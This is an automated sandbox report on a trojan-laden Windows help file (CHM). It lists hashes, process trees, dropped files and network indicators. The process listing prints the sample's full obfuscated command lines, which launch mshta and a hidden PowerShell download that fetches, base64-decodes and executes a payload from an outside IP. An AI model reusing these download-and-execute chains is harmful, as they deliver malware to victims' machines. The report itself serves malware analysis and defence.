analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Contract_12112018.chm

Full analysis: https://app.any.run/tasks/f6d97101-a5bf-4344-80aa-ed300d63f5c6
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 15, 2018, 10:34:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

009C457C4456A0D0D3B38627135B6F18

SHA1:

D167B13988AA0B277426489F343A484334A394D0

SHA256:

00A1397C9C65BABE9CCBCAB73D09FDF874A35A5783BAAB60C03C18C761DA6458

SSDEEP:

96:PEFZLu40Z5Yllc1WBQi58V3eOjU7HZwsn6bde/j17b4oFY9aMfVzm5ivx0n1/JO:PSg4PwWBd581e+UtJnf1AqY9aM05GmO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • jepfepff.com (PID: 3136)
      • jepfepff.com (PID: 1320)
      • jepfepf.com (PID: 272)
      • cmd.exe (PID: 1600)
      • cmd.exe (PID: 1304)
      • jepfep.com (PID: 3744)
      • cmd.exe (PID: 3836)
    • Changes the autorun value in the registry

      • jepfep.com (PID: 3744)
  • SUSPICIOUS

    • Reads internet explorer settings

      • hh.exe (PID: 3128)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 1600)
    • Starts application with an unusual extension

      • cmd.exe (PID: 1304)
      • jepfepff.com (PID: 1320)
      • jepfepf.com (PID: 272)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1304)
      • jepfepf.com (PID: 272)
      • jepfep.com (PID: 3744)
    • Starts CMD.EXE for commands execution

      • hh.exe (PID: 3128)
      • mshta.exe (PID: 4060)
      • jepfep.com (PID: 3744)
    • Creates files in the user directory

      • jepfep.com (PID: 3744)
    • Creates files in the program directory

      • cmd.exe (PID: 3836)
    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 3836)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 4060)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chi | Windows HELP Index (81)
.chm | Windows HELP File (18.9)

EXIF

EXE

LanguageCode: English (U.S.)
CHMVersion: 3
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
10
Malicious processes
6
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start hh.exe no specs cmd.exe no specs mshta.exe cmd.exe jepfepff.com no specs jepfepff.com no specs jepfepf.com jepfep.com cmd.exe no specs systeminfo.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3128"C:\Windows\hh.exe" C:\Users\admin\AppData\Local\Temp\Contract_12112018.chmC:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1600"C:\Windows\System32\cmd.exe" ,/b,^, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,, ,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/C,, st%ALLUSERSPROFILE:~8,1%rt msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.72.139/liC:\Windows\System32\cmd.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4060mshta Http://146.0.72.139/liC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1304"C:\Windows\System32\cmd.exe" /c copy C:\\Windows\\System32\\cmd.exe C:\Users\admin\AppData\Local\Temp\\jepfepff.com && C:\Users\admin\AppData\Local\Temp\\jepfepff.com /c &Set skk= -Encoding&& Set ski= Byte && Set asidfjhfwssss=den -n%ALLUSERSPROFILE:~5,1%ninter&&Set asidfjhfwsss=-n%ALLUSERSPROFILE:~5,1%p -W hid&& Set asidfjhfwsssss=active -c (new-%ALLUSERSPROFILE:~5,1%bj&& Set asidfjhfwss=ect System.Net.WebClie&& Set par5=nt).D%ALLUSERSPROFILE:~5,1%wnl%ALLUSERSPROFILE:~5,1%&& Set asidfjhfwsssssssssssssss=adfile& copy C:\\Windows\\System32\\WiNDOWSPOWerShELl\\v1.0\\pOWErsheLl.ExE C:\Users\admin\AppData\Local\Temp\\jepfepf.com& C:\Users\admin\AppData\Local\Temp\\jepfepff.com /c C:\Users\admin\AppData\Local\Temp\\jepfepf.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('Ht^Tp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\jepfep.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\jepfep.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\jepfep.com $sv; C:\Users\admin\AppData\Local\Temp\\jepfep.com;C:\Windows\System32\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3136C:\Users\admin\AppData\Local\Temp\\jepfepff.com /c C:\Users\admin\AppData\Local\Temp\jepfepff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1320C:\Users\admin\AppData\Local\Temp\\jepfepff.com /c C:\Users\admin\AppData\Local\Temp\\jepfepf.com %asidfjhfwsss%%asidfjhfwssss%%asidfjhfwsssss%%asidfjhfwss%%par5%%asidfjhfwsssssssssssssss%('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\jepfep.txt'); $sr=Get-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\jepfep.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content %skk% %ski% C:\Users\admin\AppData\Local\Temp\\jepfep.com $sv; C:\Users\admin\AppData\Local\Temp\\jepfep.com;C:\Users\admin\AppData\Local\Temp\jepfepff.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
272C:\Users\admin\AppData\Local\Temp\\jepfepf.com -nop -W hidden -noninteractive -c (new-object System.Net.WebClient).Downloadfile('HtTp://146.0.72.139/flk', 'C:\Users\admin\AppData\Local\Temp\\jepfep.txt'); $sr=Get-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\jepfep.txt; $sk=[System.Text.Encoding]::UTF8.GetString($sr); $sv=[Convert]::FromBase64String($sk); Add-Content -Encoding Byte C:\Users\admin\AppData\Local\Temp\\jepfep.com $sv; C:\Users\admin\AppData\Local\Temp\\jepfep.com;C:\Users\admin\AppData\Local\Temp\jepfepf.com
jepfepff.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3744"C:\Users\admin\AppData\Local\Temp\jepfep.com"C:\Users\admin\AppData\Local\Temp\jepfep.com
jepfepf.com
User:
admin
Company:
MS DefenderApplication
Integrity Level:
MEDIUM
Description:
MS DefenderApplicationController
Version:
2.0.4.9
3836"C:\Windows\System32\cmd.exe" /C systeminfo >> C:\ProgramData\INFOCONTENT.TXTC:\Windows\System32\cmd.exejepfep.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1824systeminfo C:\Windows\system32\systeminfo.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
538
Read events
454
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
0
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
4060mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\li[1]html
MD5:D0FA1AB050BEDE3522650FAA54BBAB2D
SHA256:9D10F123C6252C7DB2BE34176B5D76101286DBABC976AD9E0A2493D5D7559295
272jepfepf.comC:\Users\admin\AppData\Local\Temp\jepfep.txttext
MD5:53F4A016A61040273478E1C3C10FF8A3
SHA256:9FB4281BC5994209DCED167E4D34BFEDF3B8A6F882B1A7C92F30970DB5E30548
3836cmd.exeC:\ProgramData\INFOCONTENT.TXTtext
MD5:A210F5CD3A0C8FBD03186D867DF6A49C
SHA256:B5257B5C74EB55165CB822B65E353E099BC5645BCCDBB9A5754559C1D940B47F
272jepfepf.comC:\Users\admin\AppData\Local\Temp\jepfep.comexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
3744jepfep.comC:\Users\admin\AppData\Roaming\conhost.exe 1C9B74E8.exeexecutable
MD5:13CC98FCB654AC83CDA6D3EC9946FA9B
SHA256:0E0729B51709325688F2741E2D5C6B3F547901837D89C203CB8AA2985B5F0018
1304cmd.exeC:\Users\admin\AppData\Local\Temp\jepfepff.comexecutable
MD5:AD7B9C14083B52BC532FBA5948342B98
SHA256:17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
1304cmd.exeC:\Users\admin\AppData\Local\Temp\jepfepf.comexecutable
MD5:92F44E405DB16AC55D97E3BFE3B132FA
SHA256:6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4060
mshta.exe
GET
200
146.0.72.139:80
http://146.0.72.139/li
NL
html
2.93 Kb
suspicious
272
jepfepf.com
GET
200
146.0.72.139:80
http://146.0.72.139/flk
NL
text
136 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4060
mshta.exe
146.0.72.139:80
Hostkey B.v.
NL
suspicious
272
jepfepf.com
146.0.72.139:80
Hostkey B.v.
NL
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
272
jepfepf.com
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
272
jepfepf.com
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
272
jepfepf.com
Misc activity
POLICY [PTsecurity] Executable base64 Payload
No debug info